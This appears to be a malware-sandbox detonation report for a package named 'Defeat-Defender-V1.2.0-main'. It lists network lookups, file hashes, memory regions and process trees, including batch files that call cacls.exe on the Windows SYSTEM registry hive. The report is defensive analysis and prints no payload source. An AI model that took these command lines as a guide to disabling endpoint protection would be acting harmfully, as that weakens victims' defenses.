US 8.8.8.8:53 www.google.com udp
NL 142.250.179.196:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
NL 142.250.179.196:443 www.google.com udp
US 8.8.8.8:53 196.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 location.services.mozilla.com udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 35.190.72.216:443 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
NL 142.250.179.174:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
FR 23.200.86.251:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
NL 142.250.179.174:443 redirector.gvt1.com udp
US 8.8.8.8:53 r1---sn-aigzrnsr.gvt1.com udp
GB 74.125.175.38:443 r1---sn-aigzrnsr.gvt1.com tcp
US 8.8.8.8:53 r1.sn-aigzrnsr.gvt1.com udp
US 8.8.8.8:53 r1.sn-aigzrnsr.gvt1.com udp
GB 74.125.175.38:443 r1.sn-aigzrnsr.gvt1.com udp
US 8.8.8.8:53 216.72.190.35.in-addr.arpa udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
US 8.8.8.8:53 251.86.200.23.in-addr.arpa udp
US 8.8.8.8:53 174.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 38.175.125.74.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp

Files

C:\Users\Admin\AppData\Local\Temp\tmp.vbs

MD5 9313d55e26ad30ddcbc046fe8013a21d
SHA1 a5712ce8864d7b0ca88b94c64226dfeb2221457f
SHA256 121ab5b57fb09d3c520a7fd6dfaa5b87844e1e8379a9635e7a737934e7e9226a
SHA512 77b7f3c2aca2ba61519a9fed7dbb3e7f2dd803bd566eeb9531e1ed038dff68e88c4d2f73a83e37396fd475f57dbdef55966361176dde70d1343747aca5888ba7

memory/464-2-0x00007FFE9D653000-0x00007FFE9D655000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hgmx1ug2.uev.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/464-5-0x00000194BF000000-0x00000194BF022000-memory.dmp

memory/464-13-0x00007FFE9D650000-0x00007FFE9E111000-memory.dmp

memory/464-14-0x00007FFE9D650000-0x00007FFE9E111000-memory.dmp

memory/464-17-0x00007FFE9D650000-0x00007FFE9E111000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2bdac358d06bbc173ed9b971328b99be
SHA1 b36ae68965e1989c12b33cbbdc873dbcb4863ef7
SHA256 b57143f72c786b38102de918ebf9248e1f8b1c13ddb50872d089750d6f12dc73
SHA512 50a55652b4214d61f974f060112e7f9635236df05c105e365d9fa87cefb090bd1fd25f968ebdef74a0f9d06a914087dcbb0f5889189e64d8152ad69397bff4c3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 38f0f14cc7ca72ad51216866e66efb4e
SHA1 34ed0f47a4aaa95e786ca9f125b0341b38bfb9be
SHA256 668820fc659c9d229d32731ead41381eca0e5fb57232bbd3ef0118f5a21fc501
SHA512 4a7d00c585784cf1aec6ed82d8c78542d2db3b9da30d8db20680a1ee9fd45b697207fbd459557336f2166d8b6ac17016f9e71c61ad351f2915bb163c8ed2b73a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d42b6da621e8df5674e26b799c8e2aa
SHA1 ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA256 5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA512 53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 10890cda4b6eab618e926c4118ab0647
SHA1 1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d
SHA256 00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14
SHA512 a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1aefe566d0c19c9e3ddaf9ea005f71c0
SHA1 8d8cfb0d2192706100eb241f38a32b31f03329f1
SHA256 dc85b671f8ebac6cfa68897b1826019925c95a5ec36676fe18ba0085f437905a
SHA512 f22782b33f7990a0783154fbe6d49e03f16c873a3b4c91f1fc5ed76d0e7b88f0df876ccdf007828ba4d9a5f97cb2362f922cbacad03de5804bc8abeb36cb2d09

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 083782a87bd50ffc86d70cbc6f04e275
SHA1 0c11bc2b2c2cf33b17fff5e441881131ac1bee31
SHA256 7a54dcc99ebfb850afde560857e2d1f764a53ff09efd03222f56ab547539798f
SHA512 a7e56293e07acce20e69dceb13282e5d1eed2ef972a4c9cf1fb4f973b4b7d6a9ca8714fc547ab662842205383891372a2386fc3a12af3d7e4ef6a195f8a2bf02

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 217d9191dfd67252cef23229676c9eda
SHA1 80d940b01c28e3933b9d68b3e567adc2bac1289f
SHA256 e64811c3e57476bb644539824034cabe2cabcb88941122193e2af328f5eb2133
SHA512 86767aa3c0eec425b7c6dbfd70a4a334fb5b1227c05fb06fbb3845e7b6974008386276f441c8e66e2bf9b0ae0a76133c4e5602211788cd702eaeadd12c5ff757

memory/4600-129-0x00007FFE7B8F0000-0x00007FFE7B900000-memory.dmp

memory/4600-131-0x00007FFE7B8F0000-0x00007FFE7B900000-memory.dmp

memory/4600-130-0x00007FFE7B8F0000-0x00007FFE7B900000-memory.dmp

memory/4600-132-0x00007FFE7B8F0000-0x00007FFE7B900000-memory.dmp

memory/4600-133-0x00007FFE7B8F0000-0x00007FFE7B900000-memory.dmp

memory/4600-134-0x00007FFE791F0000-0x00007FFE79200000-memory.dmp

memory/4600-135-0x00007FFE791F0000-0x00007FFE79200000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 6b17eb8d08a33b0d5b71a8dddff6ba01
SHA1 42de4c02311cd9ddfa4093a3717e2b72f27fea7d
SHA256 11faf6d4b3ebc71622cb26c69f77cc905546d8602d47f3dac53edbca65321739
SHA512 8111c1719144e9695eb3fe53a57bf3ec53552a535181c79b8d4297fb00c0095eb24fe432a004266df0f4c7091131b94ef7e8b0b4479c748c571b7092fd13f7e1

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 663cf8b6a51e3ccbea23420ccc18c7a5
SHA1 b75f0003f5237a6e1d92bbd8b3ec09b46d61e64b
SHA256 93c62247bde13e9d81bdc94a4c4b25cdf8f1182a2ce3f71b9a5fad9d06f29dc2
SHA512 26a3d419b05f87188bbf2c815e3dbc72c566c26dc922372508719dc1932bce2c369e6b3cc8042c534802ac5e9c517e1a1afa778b52434b9b9ec412244c82ff01

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 209ccebe007bd02a6ed398b58e396e9a
SHA1 efee58463413a6f45f774c0de70ec5804bd98358
SHA256 cc51857b0aa3ea42f08ee8a38658bbdeb65c8da9423d361c6743259cba521010
SHA512 844ed7757f5c3e4e8fdfc43c7fbb254b228be307f3a6556d15184aed251e3dc7ef9b4d270cba42f219ee74da7bd701250b45e7edbd78be01a9d7784f89c47012

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\activity-stream.discovery_stream.json.tmp

MD5 86506a4800f7637b54bb829ce57db262
SHA1 c36581f315f3a4485d7f2f17b0c999f18441ba2b
SHA256 4db2822ab4fc6eb1deaea875060fec7622847cfb01ffd9bba47dadccfb08a394
SHA512 37aea1b4605090110e5000bf54ed1c7c95591c6c38a8d1241d2f31abe7c79f17ea37f6bcad7f63cd9f215c9686217fac634d99672ea9c00c26c620d095dbe597

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\datareporting\glean\pending_pings\51f4caa7-2bd1-4ec3-8004-1811418c29f2

MD5 37fc5355273ca6d96ec2dc2cbc521570
SHA1 e6c588bb45c1b54205c2991f35508876a2374d26
SHA256 173fadcdf75446cef5507c8261832059eeff6eedd3597069d50a328610e8e868
SHA512 2350bc64e2ebb7dc1556f812fad1deab028eaf1040ccf65f062776caa60514d8ce55287d77ee0998aec5259e19686033fc43d537a000a2425a90ab2a59e2b775

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\datareporting\glean\pending_pings\e23b16cf-7dd7-449e-a198-4a473e8f4033

MD5 b111c8b757c16e6d177f3d310fc1f461
SHA1 4d8db094d53be5910dc26a42330f6dcb63ad7cb6
SHA256 e282f0a3a3765d48fd695d535415449336bb812f260bbace69eccd9e12a081b8
SHA512 f1d12d1a1da4ebb99e40d18b121f72600abe7bb77eb8ea6413a54893919c36c75682460188a3b7fa1f9fd3dd291b143bc3cc07c91e6d01f8f541a93c90afed55

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\datareporting\glean\pending_pings\109ebbf2-c959-46c0-9dce-57ab69297c1a

MD5 6122274942c316f4c28b56adba70eb41
SHA1 8babbf09fda8ca48cdd139236fc8a939d23b0b49
SHA256 680c640ab6b7d59682b8cd9a24e2bad6805845519ada87cec909fd95acd616dc
SHA512 29a58ebb574e03eada27a272a68c9e82504a2def1da22553acd7578daf7443cad34815ccbbeb7eb9044debe454fe399bc1bfb6b52153758c3546609c757a62cf

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\datareporting\glean\db\data.safe.tmp

MD5 80fbd95a165e211af3b1628e62a20aee
SHA1 9a951366d5d1dc69daf318e3ad459a000ed2f72f
SHA256 167edc479be461887b6e6d8f3f1512cd499367c7fc17f041e9324033cacfb2b9
SHA512 b81c37a0873a0ee895fb141e60ecf1c1245e094a24fb7aeefbd675b08ac917fedbddd33d3328647b63eadb602c6272d892efa9ff3499e080f48707a2da2f3179

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\datareporting\glean\db\data.safe.tmp

MD5 af7f2f23af43f8c7fbb8c5186113fa0c
SHA1 00078bc10c52d0b3304fed9ae82da359bc542475
SHA256 9f76c4125f8f09603965f35da216c368222587caaa6322d0280fdca6064b8357
SHA512 3a596f35ee743af9568666a822b07d43eb00169f3f03fe253873cfaca279681c485dba29505dfc390841f39f2d7f57f4c02424d0db6fac8b0aaa3fe667e3df63

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\prefs.js

MD5 6d5e0935a4489aa29b172a6b1d3ee009
SHA1 2172f0ff0973edb9ec426d0b73b73577aaf08ee3
SHA256 1c1f91470c1a9c57357f6b2c30ea43858ee3120408d3b094519544f801c84639
SHA512 635385b91088007eb8eeac4fff79752b8abbfe4da471e0a08e847a2cc3e5da9782e6b2b2a28e7cbe3cebedf0d1898e6e6e1782e1e83d1875f7c4188b69de54a7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\prefs.js

MD5 42d264a96957a61c3c49e3465317e8d5
SHA1 3fb4550a895d7b273eac54f88be752b6906e1558
SHA256 b6cbb9f1c12bad5fb701e161ce0fb4e4e05a9ca3b830645ac199cff9cecd06b9
SHA512 ba5cd4b192d2378fa37238a7ca77c667c87ed48dc76b117274d475b341d25cf75e07c22b7514e4740868073c7df15a28f16da49ccdfaa97155a019877e4aff09

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\AlternateServices.bin

MD5 a16857bc593b8fe295972e014e976aba
SHA1 7872314cd27f2bf6c62cbccb48cf3786e766bf12
SHA256 20e8b466c7082a5a4bb05a34028d9e0ba60c8d52ec9e3c3e3f4aa7af67ec6755
SHA512 0122d151a3142bb7ddf0d76a7b46ca28532830542968a4018dc5cda8b00eccd0db9b8195d1830e70202514b09a8701a62dd73e9a0489d90450f1e1d6dedc42e8

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\datareporting\glean\db\data.safe.tmp

MD5 8168174f76dd892bb3fc28b8557401f1
SHA1 4afcad07c901dc90115b95196f4ca915fc340529
SHA256 d7086b4a856f33701eb705fdb7995d3b1b713e40b4ef09a017640c62de1ac113
SHA512 ed060937c742fc3501eeeb1b4a6741c9518acca34bc4ef815c53a32fa16e6899ccf7a27be8f508194e8a79dc5096eac556bca78e3d7f653bfcfe1880e32266fd

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\prefs-1.js

MD5 4b03546a216a8974455c8101dc7d26a7
SHA1 ab052b6bc2506cf74bdf6c1dea0926602a578d22
SHA256 4dd67f19d9b5b4ca845ce420cafe5011330276228b20cb65ea84cd989ba0264d
SHA512 b0a05bc22b2167870949764b940da8bce45c5bd31a71ec8d9285c84b4ccda5898eac5b4ba0f072a3959b39ef20bc2811d4deb07b33ebc9d3f78424de25c44881

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\AlternateServices.bin

MD5 fd9de7b9cfd31252e53842807939835b
SHA1 de4cbc9412899f5d969f1a69c71049342403db49
SHA256 4298537a25af075cb10b73f6ff9669756ca2ac967e572e98b51451bc2eb80616
SHA512 2b1254f2d1b773c6b8d034b035850bc1c9593d9a24ef2089efeea28c21799c7ce8648f9f4281804c48333b998349bdb28cf947e088cc4cd971b243ecfcc72819

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\sessionstore-backups\recovery.baklz4

MD5 d328cfb915782830c3be2dcc808b652c
SHA1 c46cba55e09527952e0358f48243df23d0046b0b
SHA256 23eace026d3ef2f536df9f17aaae7a63b915bf4e55b2c239808d3726b9328039
SHA512 ca88a5dcacf2e03444c7de6b1fdb39f998bee760fc0431d034a57de860ba60c20840f79a2dbbd337ee7b312e79f2951768ff57f068bd8424924d90730b3b082a

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\sessionstore-backups\recovery.baklz4

MD5 b3b0e0449805bb6a5f260b81c3c172b1
SHA1 983aadf04b69a81268f0c2917fe024d7c7d69af5
SHA256 cd2603ac2215af7b38b81eb80f71402f8e0969cad02273501aaa1f5f6415a103
SHA512 87dd1dd422bf1f5c7eb51887867f08041630f097a97ab5c74464ce07ef65fef8d8ecd68522af9fdfb47183f7ca4195b269b7634087fe774c0498ee100bb840c9

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-06 19:33

Reported

2024-08-06 19:36

Platform

win7-20240704-en

Max time kernel

119s

Max time network

119s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\Enable Smart Screen.bat"

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2572 wrote to memory of 2096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe
PID 2572 wrote to memory of 2096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe
PID 2572 wrote to memory of 2096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\Enable Smart Screen.bat"

C:\Windows\system32\cacls.exe

"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-06 19:33

Reported

2024-08-06 19:36

Platform

win10v2004-20240802-en

Max time kernel

94s

Max time network

150s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\Enable Smart Screen.bat"

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3104 wrote to memory of 4360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe
PID 3104 wrote to memory of 4360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\Enable Smart Screen.bat"

C:\Windows\system32\cacls.exe

"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"

Network

Country Destination Domain Proto
US 8.8.8.8:53 18.53.126.40.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 71.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-08-06 19:33

Reported

2024-08-06 19:36

Platform

win7-20240729-en

Max time kernel

91s

Max time network

17s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\run.bat"

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\run.bat"

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-08-06 19:33

Reported

2024-08-06 19:36

Platform

win10v2004-20240802-en

Max time kernel

149s

Max time network

153s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\run.bat"

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\run.bat"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 71.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 233.17.178.52.in-addr.arpa udp

Files

N/A